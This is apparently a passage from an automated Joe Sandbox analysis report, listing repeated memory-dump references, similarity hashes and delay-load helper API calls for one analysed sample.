                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 8b817fca07f0ee6deb957d4f45fc26f30a9d30ad6750e5c2bc9dfa77106884a8
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 8b817fca07f0ee6deb957d4f45fc26f30a9d30ad6750e5c2bc9dfa77106884a8
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 26ff7df14821662e1cfb880702e1be23f75f93ab4b488dcdcb6ad1c27b7993b4
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 26ff7df14821662e1cfb880702e1be23f75f93ab4b488dcdcb6ad1c27b7993b4
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 7363adf774c556342ce96a2d77c2b93c8923870dba1237a5b2ab2ef1a13f0679
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 7363adf774c556342ce96a2d77c2b93c8923870dba1237a5b2ab2ef1a13f0679
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fc02b893dc60e59147d06cb0c9e1d49ba5703bd2922406fa1abe5f290f90f160
                                                                                                                    • Instruction ID: 1efd41766a0c4cf42092cb3ae21c709967640372182b440db5f74ad23e666eb7
                                                                                                                    • Opcode Fuzzy Hash: fc02b893dc60e59147d06cb0c9e1d49ba5703bd2922406fa1abe5f290f90f160
                                                                                                                    • Instruction Fuzzy Hash: 93A001F6AA91927D721C6251AD4AC7B031DC7C1B26330952EFDA9A9482AC881A891876
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 29bd6a38bf6a0833c470e40da5b7881590257ed44ef87564d6848d52301ee4ad
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: 29bd6a38bf6a0833c470e40da5b7881590257ed44ef87564d6848d52301ee4ad
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6fbefed82a620fa89622df21d1204dde9d11f1973b5c24ac0d69d1b95beed6cd
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: 6fbefed82a620fa89622df21d1204dde9d11f1973b5c24ac0d69d1b95beed6cd
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a9a10c7de86d03d54fa4dc9d87f6d7bedc3dfbd440e3d34d92f8a54f4999e712
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: a9a10c7de86d03d54fa4dc9d87f6d7bedc3dfbd440e3d34d92f8a54f4999e712
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bdd3a39c6c984145085cbefde5e84ccb7332855a48f6fb87f8ca08fe63ceee39
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: bdd3a39c6c984145085cbefde5e84ccb7332855a48f6fb87f8ca08fe63ceee39
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: cedfcd70c97a86a4c0d4e8446bfde10bd98f1b43cbc3750ac2da44b2754376d4
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: cedfcd70c97a86a4c0d4e8446bfde10bd98f1b43cbc3750ac2da44b2754376d4
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d75f27740a90aa7c28003b2fd127a5f65a951bbdb19abbd52ab5af3ad06b7a84
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: d75f27740a90aa7c28003b2fd127a5f65a951bbdb19abbd52ab5af3ad06b7a84
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a2d54c3def95e23c4bda5d137d5f34c1810604b024ec6712f7a7ce2677dfb895
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: a2d54c3def95e23c4bda5d137d5f34c1810604b024ec6712f7a7ce2677dfb895
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3854ac7ceef7c8a817ef76e4666e1a237c7ac08da3aa4bcbcca840142ba4c297
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: 3854ac7ceef7c8a817ef76e4666e1a237c7ac08da3aa4bcbcca840142ba4c297
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
